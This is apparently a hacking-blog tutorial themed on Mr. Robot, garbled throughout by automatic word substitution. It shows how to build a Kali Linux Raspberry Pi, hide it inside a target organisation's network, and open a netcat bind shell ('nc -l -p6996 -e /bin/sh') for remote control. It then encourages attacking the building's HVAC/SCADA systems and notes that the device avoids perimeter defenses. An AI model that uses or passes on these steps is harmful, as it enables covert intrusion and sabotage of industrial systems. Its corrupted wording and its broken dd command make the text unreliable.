Welcome again, my Mr Robotic afacionados!
A lot of you’ve got written me telling me how a lot you benefit from the Mr. Robotic sequence on USA Community and Amazon Prime. I’m additionally an enormous fan! If you have not seen it but, you must. It might be the perfect hacking present on TV.
Mr. Robotic is a couple of younger man with a social conscience (with extreme social anxiousness and a depraved morphine behavior) who works in cyber safety by day, defending the community of Evil Company; whereas at evening, is a hacker vigilante for good (does this state of affairs match anybody we all know?). Ultimately, he will get recruited by a hacker group generally known as fsociety (which seems and acts very similar to Nameless) to convey down Evil Company.
One of the extra fascinating components of the present, from my perspective, is that the hacking is lifelike. No swirling, animated viruses like in so many different TV reveals and films, however quite good ‘ole command line Linux.
The Hacking Raspberry Pi
In episode 4 (“eps1.3__da3m0ns.mp4“), Elliott, the primary character, is planning on utilizing a Raspberry Pi to manage the heating system of the storage room the place Evil Corp is storing their tape backups. If they will increase the temperature sufficient within the storage room, it’ll render these tape backups unusable.
On these tape backups are the information of 70% of the buyer debt within the world, together with billions of {dollars} of pupil loans. The hackers imagine that if they will destroy these information, tens of millions of individuals will be freed from their pupil loans and client debt held by Evil Corp.
In this tutorial, I’ll present you find out how to create a hacking Raspberry Pi (for these of you’re unaware, a Raspberry Pi is a tiny, cheap, credit-card sized laptop that’s highly effective) that may be managed remotely, just like what Elliott on Mr. Robotic is about to make use of on this episode.
Step 1: Obtain the ARM Model of Kali
The first step, in fact, is to obtain the ARM model of Kali. Raspberry Pi and lots of cell units use ARM CPUs as they’re extra vitality environment friendly and cooler, so the Kali working system should be compiled particularly for it.
Thankfully, the products people at Offensive Safety have already achieved this for us. Navigate to Offensive Safety’s obtain web page to get the Raspberry Pi file. After getting downloaded the picture, unzip it with WinRAR, WinZip, or another archiving software that may unzip information.
Step 2: Obtain & Set up Win32 Disk Imager
Now we have to set up the Win32 Disk Imager, which you’ll be able to obtain from SourceForge. This software allows us to jot down the picture to an SD card or USB drive. I suggest a quick SD card of not less than 4 GB. You should purchase a 16 GB now for about 7 {dollars}.
Step 3: Run Disk Imager
Now that you’ve put in Disk Imager, proper click on on it and run it as “administrator.”
Choose the Kali picture within the “Picture File” window, direct the picture to your SD card within the “System” window, then click on on the “Write” button. Be affected person, this may take someday.
If you utilizing Linux, issues are bit less complicated. No have to obtain something. You merely use the dd command (amongst different issues, the dd command is used to create a disk picture in digital forensics). If we assume the picture is called Kali-RPI.img and the SD card is at /dev/sdc and we wish it to repeat in 512k block measurement (bs), then we merely have to sort:
kali >dd if =Kali-RPI.img of = /dev/sdc bs=512k
Step 4: Set up the SD Card within the Raspberry Pi
We have to take away the SD card out of your PC and now set up the SD card into our Raspberry Pi and boot it up. When it boots up, it takes you to a command line asking you to your username and password. The default username and password are:
username: kali
password: kali
Success! Now you’ve got an tiny Kali hacking software that may be positioned wherever!
Step 5: Begin a Netcat Listener on Raspberry Pi
Now, that we’ve Raspberry Pi operating Kali, we will place it wherever throughout the Evil Company community. Raspberry Pi has an Ethernet connection and you may add a wi-fi adapter. The Raspberry Pi is so small it may be hidden in quite a few locations. These embody inside a desktop laptop, inside a phone, clock, and so on. with out being observed.
As soon as it’s related, we will begin a Netcat listener (Netcat is constructed into Kali) on it by typing:
kali > nc -l -p6996 -e /bin/sh
This can allow Elliott to connect with a terminal on the Raspberry Pi from wherever utilizing port 6996.
Now, Elliott can join again to the Raspberry Pi by utilizing Netcat on his Kali system and typing:
kali > nc 192.168.1.105 6996
When he sorts ifconfig, he can see that he has a terminal on the Raspberry Pi able to do some hacking of Evil Corp’s HVAC system! Make sure to use the IP tackle of the Raspberry Pi in your surroundings.
Of course, there are different strategies to connecting again to the Raspberry Pi. He may use SSH, and if he wished a GUI, set up the VNC Server and join again to it with full GUI management over Kali. The issue with each of these strategies is that they’re extra prone to be detected by Evil Company’s perimeter community defenses.
One revolutionary method to join could be to show the wi-fi adapter into an Wi-Fi AP. On this method, Elliot and mates may hook up with the community remotely or not less than the vary of Wi-Fi with a great antenna. To show th eRPI into an AP, see my tutorial on Creating an Evil Twin AP right here.
Step 6: Wreak Havoc
Now that Elliott has a Kali set up inside Evil Company’s community, he ought to be capable to use the multitude of instruments accessible for wreaking havoc on Evil Company in Kali. In episode 4, he desires to manage the HVAC system and switch up the warmth to soften the backup tapes. He must be ready to do this now that he has embedded Kali inside Evil Company’s community.
HVAC techniques are SCADA/ICS techniques like practically all industrial techniques. They’ve small PLC’s embedded in them which are managed by obscure SCADA/ICS protocols. For extra on SCADA/ICS techniques, see my SCADA Hacking and Safety part.
As this present progresses and Elliott demonstrates extra hacks, I’ll attempt to maintain you up on how he does them.
